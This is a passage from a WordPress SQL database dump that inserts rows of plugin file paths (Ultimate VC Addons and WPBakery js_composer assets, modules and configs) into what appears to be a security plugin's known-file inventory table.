(771, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_list_icon.php'),
(772, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_modals.php'),
(773, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_parallax.php'),
(774, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_pricing_tables.php'),
(775, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_range_slider.php'),
(776, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_spacer.php'),
(777, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_stats_counter.php'),
(778, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_sticky_section.php'),
(779, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_swatch_book.php'),
(780, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_tab.php'),
(781, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_team.php'),
(782, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_video_banner.php'),
(783, 'wp-content/plugins/Ultimate_VC_Addons/modules/utlimate-tab-backend.php'),
(784, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Animator.php'),
(785, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Border.php'),
(786, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_BoxShadow.php'),
(787, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Button.php'),
(788, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_ColorPicker.php'),
(789, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_DateTime_Picker.php'),
(790, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Font_Manager_Param.php'),
(791, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Gradient.php'),
(792, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Icon_Manager_Param.php'),
(793, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Image_Single.php'),
(794, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Margin.php'),
(795, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Navigation.php'),
(796, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Number.php'),
(797, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_ParamHeading.php'),
(798, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Radio_Image.php'),
(799, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Responsive.php'),
(800, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Select.php'),
(801, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Spacing.php'),
(802, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Switch.php'),
(803, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Buttons.php'),
(804, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_CountDown.php'),
(805, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Dual_Button.php'),
(806, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Flip_Box.php'),
(807, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Google_Maps.php'),
(808, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Headings.php'),
(809, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Highlight_Box.php'),
(810, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Info_Box.php'),
(811, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Info_Tables.php'),
(812, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Interactive_Banner_2.php'),
(813, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Interactive_Banners.php'),
(814, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Just_Icon.php'),
(815, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Modals.php'),
(816, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Pricing_Tables.php'),
(817, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Stats_Counter.php'),
(818, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Team.php'),
(819, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_link.php'),
(820, 'wp-content/plugins/Ultimate_VC_Addons/templates/index.php'),
(821, 'wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/index.php'),
(822, 'wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design01.php'),
(823, 'wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design02.php'),
(824, 'wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design03.php'),
(825, 'wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design04.php'),
(826, 'wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design05.php'),
(827, 'wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design06.php'),
(828, 'wp-content/plugins/Ultimate_VC_Addons/templates/pricing/index.php'),
(829, 'wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design01.php'),
(830, 'wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design02.php'),
(831, 'wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design03.php'),
(832, 'wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design04.php'),
(833, 'wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design05.php'),
(834, 'wp-content/plugins/Ultimate_VC_Addons/templates/pricing/pricing-design06.php'),
(835, 'wp-content/plugins/Ultimate_VC_Addons/templates/ult_tab/single_tab.php'),
(836, 'wp-content/plugins/Ultimate_VC_Addons/templates/ult_tab/ult_tab_element.php'),
(837, 'wp-content/plugins/Ultimate_VC_Addons/vc_templates/single_tab.php'),
(838, 'wp-content/plugins/Ultimate_VC_Addons/vc_templates/ult_tab_element.php'),
(839, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/admin/index.php'),
(840, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/admin/js/google-fonts-admin.js'),
(841, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/admin/js/mapping.js'),
(842, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/admin/js/select2.js'),
(843, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/css/demo-files/demo.js'),
(844, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/css/demo.html'),
(845, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/css/fonts/WooComposer.svg'),
(846, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/css/fonts/slick.svg'),
(847, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/css/ie7/ie7.js'),
(848, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/js/admin.js'),
(849, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/js/custom.js'),
(850, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/js/slick.js'),
(851, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/js/unveil.js'),
(852, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/js/woocomposer.min.js'),
(853, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-loop-style01.php'),
(854, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-loop-style02.php'),
(855, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-loop-style03.php'),
(856, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-loop-style04.php'),
(857, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-single-style01.php'),
(858, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-single-style02.php'),
(859, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-single-style03.php'),
(860, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_carousel.php'),
(861, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_carousel_cat.php'),
(862, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_cat_grid.php'),
(863, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_grid.php'),
(864, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_list.php'),
(865, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_product.php'),
(866, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/woocomposer_pagination.php'),
(867, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/woocomposer.php'),
(868, 'wp-content/plugins/index.php'),
(869, 'wp-content/plugins/js_composer/assets/css/lib/monosocialiconsfont/fonts/MonoSocialIconsFont.svg'),
(870, 'wp-content/plugins/js_composer/assets/css/lib/typicons/src/font/typicons.svg'),
(871, 'wp-content/plugins/js_composer/assets/css/lib/vc-entypo/fonts/vc_entypo.svg'),
(872, 'wp-content/plugins/js_composer/assets/css/lib/vc-linecons/fonts/vc_linecons.svg'),
(873, 'wp-content/plugins/js_composer/assets/css/lib/vc-material/fonts/vc_material.svg'),
(874, 'wp-content/plugins/js_composer/assets/css/lib/vc-open-iconic/fonts/vc_openiconic.svg'),
(875, 'wp-content/plugins/js_composer/assets/fonts/vc_grid/vc_grid_v1.svg'),
(876, 'wp-content/plugins/js_composer/assets/fonts/vc_icons/fonts/VC-Icons.svg'),
(877, 'wp-content/plugins/js_composer/assets/fonts/vc_icons_v2/fonts/vcpb-plugin-icons.svg'),
(878, 'wp-content/plugins/js_composer/assets/js/dist/backend-actions.min.js'),
(879, 'wp-content/plugins/js_composer/assets/js/dist/backend.min.js'),
(880, 'wp-content/plugins/js_composer/assets/js/dist/edit-form.min.js'),
(881, 'wp-content/plugins/js_composer/assets/js/dist/frontend-editor.min.js'),
(882, 'wp-content/plugins/js_composer/assets/js/dist/grid-builder.min.js'),
(883, 'wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js'),
(884, 'wp-content/plugins/js_composer/assets/js/dist/page_editable.min.js'),
(885, 'wp-content/plugins/js_composer/assets/js/dist/settings.min.js'),
(886, 'wp-content/plugins/js_composer/assets/js/dist/vc_grid.min.js'),
(887, 'wp-content/plugins/js_composer/assets/js/editors/templates-preview.js'),
(888, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/charts/vc_line_chart.js'),
(889, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/charts/vc_pie.js'),
(890, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/charts/vc_round_chart.js'),
(891, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/container.js'),
(892, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/container_with_parent.js'),
(893, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_column.js'),
(894, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_column_inner.js'),
(895, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_row.js'),
(896, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_row_inner.js'),
(897, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_section.js'),
(898, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_column_text.js'),
(899, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_flickr.js'),
(900, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_posts_slider.js'),
(901, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_raw_js.js'),
(902, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/content/vc_toggle.js'),
(903, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_accordion.js'),
(904, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_accordion_tab.js'),
(905, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tab.js'),
(906, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tabs.js'),
(907, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_tour.js'),
(908, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/vc_carousel.js');
INSERT INTO `zdenl_wfknownfilelist` (`id`, `path`) VALUES
(909, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_basic_grid.js'),
(910, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_masonry_grid.js'),
(911, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_masonry_media_grid.js'),
(912, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/grids/vc_media_grid.js'),
(913, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/images/vc_gallery.js'),
(914, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/images/vc_images_carousel.js'),
(915, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/images/vc_single_image.js'),
(916, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/tta_events.js'),
(917, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_accordion.js'),
(918, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_pageable.js'),
(919, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_section.js'),
(920, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_tabs.js'),
(921, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/tta/vc_tta_tour.js'),
(922, 'wp-content/plugins/js_composer/assets/js/frontend_editor/vendors/plugins/jwplayer.js'),
(923, 'wp-content/plugins/js_composer/assets/js/vendors/advanced_custom_fields.js'),
(924, 'wp-content/plugins/js_composer/assets/js/vendors/qtranslate_backend.js'),
(925, 'wp-content/plugins/js_composer/assets/js/vendors/qtranslate_frontend.js'),
(926, 'wp-content/plugins/js_composer/assets/js/vendors/qtranslatex_backend.js'),
(927, 'wp-content/plugins/js_composer/assets/js/vendors/qtranslatex_frontend.js'),
(928, 'wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js'),
(929, 'wp-content/plugins/js_composer/assets/js/vendors/woocommerce.js'),
(930, 'wp-content/plugins/js_composer/assets/js/vendors/yoast.js'),
(931, 'wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/ace.js'),
(932, 'wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/mode-css.js'),
(933, 'wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/theme-chrome.js'),
(934, 'wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/worker-css.js'),
(935, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/dist/js/bootstrap.min.js'),
(936, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/affix.min.js'),
(937, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/alert.min.js'),
(938, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/button.min.js'),
(939, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/carousel.min.js'),
(940, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/collapse.min.js'),
(941, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/dropdown.min.js'),
(942, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/modal.min.js'),
(943, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/popover.min.js'),
(944, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/scrollspy.min.js'),
(945, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/tab.min.js'),
(946, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/tooltip.min.js'),
(947, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/transition.min.js'),
(948, 'wp-content/plugins/js_composer/assets/lib/bower/chartjs/Chart.min.js'),
(949, 'wp-content/plugins/js_composer/assets/lib/bower/flexslider/fonts/flexslider-icon.svg'),
(950, 'wp-content/plugins/js_composer/assets/lib/bower/flexslider/jquery.flexslider-min.js'),
(951, 'wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-brands-400.svg'),
(952, 'wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-regular-400.svg'),
(953, 'wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-solid-900.svg'),
(954, 'wp-content/plugins/js_composer/assets/lib/bower/imagesloaded/imagesloaded.pkgd.min.js'),
(955, 'wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js'),
(956, 'wp-content/plugins/js_composer/assets/lib/bower/jquery-ui-tabs-rotate/jquery-ui-tabs-rotate.min.js'),
(957, 'wp-content/plugins/js_composer/assets/lib/bower/json-js/json2.min.js'),
(958, 'wp-content/plugins/js_composer/assets/lib/bower/lessjs/dist/less.min.js'),
(959, 'wp-content/plugins/js_composer/assets/lib/bower/masonry/dist/masonry.pkgd.min.js'),
(960, 'wp-content/plugins/js_composer/assets/lib/bower/nivoslider/jquery.nivo.slider.pack.js'),
(961, 'wp-content/plugins/js_composer/assets/lib/bower/progress-circle/ProgressCircle.min.js'),
(962, 'wp-content/plugins/js_composer/assets/lib/bower/scrollTo/jquery.scrollTo.min.js'),
(963, 'wp-content/plugins/js_composer/assets/lib/bower/skrollr/dist/skrollr.min.js'),
(964, 'wp-content/plugins/js_composer/assets/lib/bower/twbs-pagination/jquery.twbsPagination.min.js'),
(965, 'wp-content/plugins/js_composer/assets/lib/bower/vcIconPicker/jquery.fonticonpicker.min.js'),
(966, 'wp-content/plugins/js_composer/assets/lib/bower/zoom/jquery.zoom.min.js'),
(967, 'wp-content/plugins/js_composer/assets/lib/owl-carousel2-dist/owl.carousel.min.js'),
(968, 'wp-content/plugins/js_composer/assets/lib/php.default/php.default.min.js'),
(969, 'wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js'),
(970, 'wp-content/plugins/js_composer/assets/lib/vc-tta-autoplay/vc-tta-autoplay.min.js'),
(971, 'wp-content/plugins/js_composer/assets/lib/vc_accordion/vc-accordion.min.js'),
(972, 'wp-content/plugins/js_composer/assets/lib/vc_carousel/fonts/glyphicons-halflings-regular.svg'),
(973, 'wp-content/plugins/js_composer/assets/lib/vc_carousel/js/transition.min.js'),
(974, 'wp-content/plugins/js_composer/assets/lib/vc_carousel/js/vc_carousel.min.js'),
(975, 'wp-content/plugins/js_composer/assets/lib/vc_chart/jquery.vc_chart.min.js'),
(976, 'wp-content/plugins/js_composer/assets/lib/vc_image_zoom/vc_image_zoom.min.js'),
(977, 'wp-content/plugins/js_composer/assets/lib/vc_line_chart/vc_line_chart.min.js'),
(978, 'wp-content/plugins/js_composer/assets/lib/vc_round_chart/vc_round_chart.min.js'),
(979, 'wp-content/plugins/js_composer/assets/lib/vc_tabs/vc-tabs.min.js'),
(980, 'wp-content/plugins/js_composer/assets/lib/vc_waypoints/vc-waypoints.min.js'),
(981, 'wp-content/plugins/js_composer/assets/vc/blur.svg'),
(982, 'wp-content/plugins/js_composer/assets/vc/loaders/spinner-light.svg'),
(983, 'wp-content/plugins/js_composer/assets/vc/loaders/spinner.svg'),
(984, 'wp-content/plugins/js_composer/assets/vc/logo/wpb-logo-white.svg'),
(985, 'wp-content/plugins/js_composer/assets/vc/logo/wpb-logo-white_32.svg'),
(986, 'wp-content/plugins/js_composer/assets/vc/logo/wpb-logo.svg'),
(987, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-accordion.svg'),
(988, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-acf.svg'),
(989, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-button.svg'),
(990, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-category.svg'),
(991, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-contact-form-7.svg'),
(992, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-cta.svg'),
(993, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-custom-fields.svg'),
(994, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-doughnut-chart.svg'),
(995, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-empty-space.svg'),
(996, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-excerpt.svg'),
(997, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-facebook.svg'),
(998, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-faq-toggle.svg'),
(999, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-flickr.svg'),
(1000, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-fonts.svg'),
(1001, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-maps.svg'),
(1002, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-plus.svg'),
(1003, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-gravity-forms.svg'),
(1004, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-gutenberg.svg'),
(1005, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-hover-box.svg'),
(1006, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-icon.svg'),
(1007, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-image-carousel.svg'),
(1008, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-image-gallery.svg'),
(1009, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-layer-slider.svg'),
(1010, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-line-chart.svg'),
(1011, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-media-grid.svg'),
(1012, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-media-masonry-grid.svg'),
(1013, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-message-box.svg'),
(1014, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-misc.svg'),
(1015, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-my-shortcode.svg'),
(1016, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-ninja-forms.svg'),
(1017, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-pageable-container.svg'),
(1018, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-pie-chart.svg'),
(1019, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-pinterest.svg'),
(1020, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-author.svg'),
(1021, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-date.svg'),
(1022, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-grid.svg'),
(1023, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-masonry-grid.svg'),
(1024, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-title.svg'),
(1025, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-posts-slider-2.svg'),
(1026, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-posts-slider.svg'),
(1027, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-progress-bar.svg'),
(1028, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-raw-html.svg'),
(1029, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-raw-js.svg'),
(1030, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-revolution-slider.svg'),
(1031, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-row.svg'),
(1032, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-section.svg'),
(1033, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator-with-text.svg'),
(1034, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator-zig-zag.svg'),
(1035, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator.svg'),
(1036, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-single-image.svg'),
(1037, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-tabs.svg'),
(1038, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-text-block.svg'),
(1039, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-tour.svg'),
(1040, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-twitter.svg'),
(1041, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-vc-logo.svg'),
(1042, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-video.svg'),
(1043, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-widget-sidebar.svg'),
(1044, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-woo-commerce.svg'),
(1045, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-wordpress.svg'),
(1046, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-wpb-logo.svg'),
(1047, 'wp-content/plugins/js_composer/config/buttons/shortcode-vc-btn.php'),
(1048, 'wp-content/plugins/js_composer/config/buttons/shortcode-vc-cta.php'),
(1049, 'wp-content/plugins/js_composer/config/containers/shortcode-vc-column-inner.php'),
(1050, 'wp-content/plugins/js_composer/config/containers/shortcode-vc-column.php'),
(1051, 'wp-content/plugins/js_composer/config/containers/shortcode-vc-row-inner.php'),
(1052, 'wp-content/plugins/js_composer/config/containers/shortcode-vc-row.php'),
(1053, 'wp-content/plugins/js_composer/config/containers/shortcode-vc-section.php'),
(1054, 'wp-content/plugins/js_composer/config/content/shortcode-vc-column-text.php'),
(1055, 'wp-content/plugins/js_composer/config/content/shortcode-vc-custom-heading.php'),
(1056, 'wp-content/plugins/js_composer/config/content/shortcode-vc-empty-space.php'),
(1057, 'wp-content/plugins/js_composer/config/content/shortcode-vc-flickr.php'),
(1058, 'wp-content/plugins/js_composer/config/content/shortcode-vc-gallery.php'),
(1059, 'wp-content/plugins/js_composer/config/content/shortcode-vc-gmaps.php'),
(1060, 'wp-content/plugins/js_composer/config/content/shortcode-vc-hoverbox.php'),
(1061, 'wp-content/plugins/js_composer/config/content/shortcode-vc-icon.php'),
(1062, 'wp-content/plugins/js_composer/config/content/shortcode-vc-images-carousel.php'),
(1063, 'wp-content/plugins/js_composer/config/content/shortcode-vc-line-chart.php'),
(1064, 'wp-content/plugins/js_composer/config/content/shortcode-vc-message.php'),
(1065, 'wp-content/plugins/js_composer/config/content/shortcode-vc-pie.php'),
(1066, 'wp-content/plugins/js_composer/config/content/shortcode-vc-posts-slider.php'),
(1067, 'wp-content/plugins/js_composer/config/content/shortcode-vc-progress-bar.php'),
(1068, 'wp-content/plugins/js_composer/config/content/shortcode-vc-round-chart.php'),
(1069, 'wp-content/plugins/js_composer/config/content/shortcode-vc-separator.php'),
(1070, 'wp-content/plugins/js_composer/config/content/shortcode-vc-single-image.php'),
(1071, 'wp-content/plugins/js_composer/config/content/shortcode-vc-text-separator.php'),
(1072, 'wp-content/plugins/js_composer/config/content/shortcode-vc-toggle.php'),
(1073, 'wp-content/plugins/js_composer/config/content/shortcode-vc-video.php'),
(1074, 'wp-content/plugins/js_composer/config/content/shortcode-vc-zigzag.php'),
(1075, 'wp-content/plugins/js_composer/config/content/vc-custom-heading-element.php'),
(1076, 'wp-content/plugins/js_composer/config/content/vc-icon-element.php'),
(1077, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-accordion-tab.php'),
(1078, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-accordion.php'),
(1079, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-button.php'),
(1080, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-button2.php'),
(1081, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-cta-button.php'),
(1082, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-cta-button2.php'),
(1083, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-googleplus.php'),
(1084, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tab.php'),
(1085, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tabs.php'),
(1086, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tour.php'),
(1087, 'wp-content/plugins/js_composer/config/grids/class-vc-grids-common.php'),
(1088, 'wp-content/plugins/js_composer/config/grids/shortcode-vc-basic-grid.php'),
(1089, 'wp-content/plugins/js_composer/config/grids/shortcode-vc-masonry-grid.php'),
(1090, 'wp-content/plugins/js_composer/config/grids/shortcode-vc-masonry-media-grid.php'),
(1091, 'wp-content/plugins/js_composer/config/grids/shortcode-vc-media-grid.php'),
(1092, 'wp-content/plugins/js_composer/config/grids/vc-grids-functions.php'),
